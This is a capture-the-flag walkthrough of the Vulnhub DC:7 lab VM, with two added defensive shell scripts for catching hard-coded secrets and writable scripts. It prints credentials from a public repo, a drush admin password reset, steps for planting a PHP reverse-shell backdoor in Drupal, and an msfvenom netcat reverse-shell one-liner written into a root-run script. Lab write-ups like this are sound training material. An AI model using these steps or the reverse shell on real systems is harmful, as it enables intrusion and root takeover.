Dc:7 Vulnhub Walkthrough

This is the DC:7 writeup, another of our CTF challenges for CTF players; the VM can be downloaded from VulnHub here. The credit goes to “DCAU” for designing this VM for beginners. This is a Linux-based CTF challenge where you can use your basic pentest skills to compromise the VM and escalate privileges to a root shell.

Penetration Testing Methodologies

Network Scan

  • Nmap

Footprinting

Exploiting

  • SSH login
  • Abusing Drupal Drush
  • Compromising webshell via PHP Backdoor

Privilege Escalation

  • Abusing writable Script
  • Capture the Flag

Walkthrough

Network Scanning

Let’s start with an aggressive Nmap scan as we always do; this time too we follow the same approach to identify open ports and the services running on them.

nmap -A 192.168.1.101

Hmmm! So Nmap showed a very exciting outcome, specifically on port 80, which serves HTTP and hosts a Drupal CMS; additionally, the 15 entries listed in robots.txt are the cherry on the cake.

Enumeration

Next we need to enumerate the host machine, so without wasting time we open a web browser to explore the HTTP service. The DC:7 welcome page opens in the browser and gives us a hint to search “outside the box”; this hint probably points to something on the internet rather than on the VM itself.

At the bottom of this web page we observed another hint, “@DC7User”, which could be a username.

Following this hint, we start footprinting @DC7User and find the DC7User Twitter account. This account contains a link to GitHub, https://github.com/Dc7User; perhaps the author was pointing us to this link.

The GitHub account contains a repository named staffdb, which holds PHP code.

When we open staffdb, config.php looks the most interesting, alongside a note that reads as follows:

“This is some “code” (yes, it’s not the greatest code, but that wasn’t the point) for the DC-7 challenge.

This isn’t a flag, btw, but if you have made it here, well done anyway. :-)”

We found credentials inside config.php, as shown below:

Username: dc7user
Password: MdR3xOgB7#dW
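The credentials above were recovered from a config file committed to a public repository. As a defender's counterpart, here is an added example (not code from the walkthrough or from the staffdb repository) of a simple pre-commit style check that flags hard-coded credential literals in PHP config files before they are pushed. The sample config it scans is constructed for the demonstration and does not reproduce the real password.

```shell
#!/bin/sh
# Added example: flag hard-coded credentials in PHP config files before commit.
# Not part of the DC-7 walkthrough or the staffdb repository; the sample
# config.php below is constructed, and the function names are our own.

# Matches assignments such as  $password = "x";  $cfg['db_secret'] = 'x';
# define('DB_PASSWORD', 'x');  where the right-hand side is a non-empty literal.
# Values pulled from getenv() or a variable are deliberately not matched.
SECRET_PATTERN="(pass(word|wd)?|secret|token|api_?key)[^=,]*(=>?|,)[[:space:]]*[\"'][^\"']+[\"']"

# scan_php_secrets FILE
# Prints "line:text" for each suspicious assignment; returns 1 if any were
# found (so it can gate a commit hook), 0 if the file is clean.
scan_php_secrets() {
    grep -n -i -E "$SECRET_PATTERN" "$1" && return 1
    return 0
}

# count_php_secrets FILE
# Prints the number of suspicious assignments (0 when the file is clean).
count_php_secrets() {
    n=$(grep -c -i -E "$SECRET_PATTERN" "$1") || true
    printf '%s\n' "${n:-0}"
}

# Demonstration on a constructed config.php modelled on a typical staff DB config.
demo() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
<?php
// constructed sample config, not the real staffdb file
$servername = "localhost";
$username = "dc7user";
$password = "Sample-Hardcoded-Pa55";        // flagged: literal secret in source
$dbname = "Staff";
$config['db_secret'] = 'another-sample';    // flagged: literal secret in array
$api_key = getenv('STAFFDB_API_KEY');       // not flagged: read from environment
EOF
    if scan_php_secrets "$f"; then
        echo "no hard-coded credentials found"
    else
        echo "commit blocked: move these values to environment variables or an ignored local file"
    fi
    rm -f "$f"
}

demo
```

Wire `scan_php_secrets` into a `.git/hooks/pre-commit` loop over staged `*.php` files and the commit is refused while a literal credential is present; reading the values from the environment, as the last sample line does, passes the check.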

Exploiting

Using the credentials enumerated above, we connect over SSH; after obtaining a TTY shell we begin post-exploitation enumeration by browsing the directories.

ssh dc7user@192.168.1.101

First we list the home directory, where we find a file named “mbox” containing an inbox message. The message has /opt/scripts/backup.sh as its subject, so let’s explore further.

Inside backup.sh we notice it uses drush (Drupal shell), a command-line utility for administering a Drupal site.

So we looked up drush on Google and found the command used to change an account’s password.

Therefore, we try to change the admin password using the below command:

drush user-password admin --password=raj

Now that we have changed the admin account’s password, we log in to Drupal at the following URL:

http://192.168.1.101/user/login

After accessing the admin console, it was time to exploit the web application by injecting malicious content into it. Writing PHP directly into web content does not give us a reverse shell; after spending some time we concluded that it requires the PHP module. We therefore install a new module through Manage > Extend > List > Install new module.

You can download the PHP package for Drupal from the URL below and upload the tar file to install the new module.

https://www.drupal.org/project/php

When the installation is complete, we need to enable the added module.

Again, go to Manage > Extend > Filters and tick the checkbox for PHP Filter.

Now inject the Pentest Monkey PHP script, i.e. “reverse shell backdoor.php”, as Basic page content. Don’t forget to set the listening IP and port in the script so that the connection comes back to you. Then change the text format to PHP and tick the Published checkbox. Keep the netcat listener running in order to receive the incoming shell.

When everything is set correctly, click the Preview button and you’ll get the reverse connection on netcat.

Great!! We have our netcat session as www-data, and if you check the permissions on /opt/scripts/backup.sh you will notice that www-data has full permission to read and modify this file. We can therefore abuse this writable file to escalate privileges by modifying its contents.
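The root cause of this escalation is a script that a low-privileged web account can write to. The following is an added example for defenders, not code from the walkthrough or the VM: a small audit that reports files under a scripts directory that are writable by group or others, or owned by an account other than the one expected to run them. It runs against a constructed temporary directory rather than /opt/scripts, and the function names are our own.

```shell
#!/bin/sh
# Added example: audit a scripts directory for files a non-privileged user
# could modify, the condition that made /opt/scripts/backup.sh hijackable.
# Not part of the DC-7 walkthrough; the demo directory below is constructed.

# find_writable_scripts DIR
# Prints every regular file under DIR with a group- or other-write bit set.
find_writable_scripts() {
    find "$1" -type f -perm /022 2>/dev/null | sort
}

# find_wrong_owner DIR OWNER
# Prints every regular file under DIR not owned by OWNER (e.g. root), since a
# privileged job should not execute files another account controls.
find_wrong_owner() {
    find "$1" -type f ! -user "$2" 2>/dev/null | sort
}

# audit_script_dir DIR [OWNER]
# Returns 0 when DIR passes, 1 when any file is writable by group/others or
# (if OWNER is given) owned by someone else. Findings go to stdout.
audit_script_dir() {
    dir=$1
    owner=${2:-}
    status=0
    bad=$(find_writable_scripts "$dir")
    if [ -n "$bad" ]; then
        printf 'WRITABLE by group/others:\n%s\n' "$bad"
        status=1
    fi
    if [ -n "$owner" ]; then
        bad=$(find_wrong_owner "$dir" "$owner")
        if [ -n "$bad" ]; then
            printf 'NOT owned by %s:\n%s\n' "$owner" "$bad"
            status=1
        fi
    fi
    return $status
}

# Demonstration on a constructed directory so it runs anywhere without touching /opt.
demo() {
    tmp=$(mktemp -d)
    printf '#!/bin/sh\n# constructed stand-in for backup.sh\n' > "$tmp/backup.sh"
    chmod 777 "$tmp/backup.sh"        # the weak setting found on the box
    printf '#!/bin/sh\necho rotate\n' > "$tmp/rotate.sh"
    chmod 755 "$tmp/rotate.sh"        # the hardened setting: only the owner may write
    if audit_script_dir "$tmp"; then
        echo "OK: no writable scripts under $tmp"
    else
        echo "FIX: chmod 755 and chown root on the files listed above"
    fi
    rm -rf "$tmp"
}

demo
```

Run `audit_script_dir /opt/scripts root` from a periodic job or a configuration check; a non-zero exit means a file that a privileged cron entry executes can be rewritten by another account, which is exactly the gap exploited in the next section.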

Privilege Escalation

As said above, we will abuse the writable permissions on the script. We use msfvenom to generate a malicious one-liner that returns a shell.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.106 lport=8888 R

Now copy the generated code and start another netcat listener in a new terminal.

mkfifo /tmp/ulgg; nc 192.168.1.106 8888 0</tmp/ulgg | /bin/sh >/tmp/ulgg 2>&1; rm /tmp/ulgg

Paste the copied code into the script from the www-data shell in the first netcat session, wait a while, then switch back to the second netcat listener.

After some time you will have a root shell, and the final flag can be found in the root directory, as shown below.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here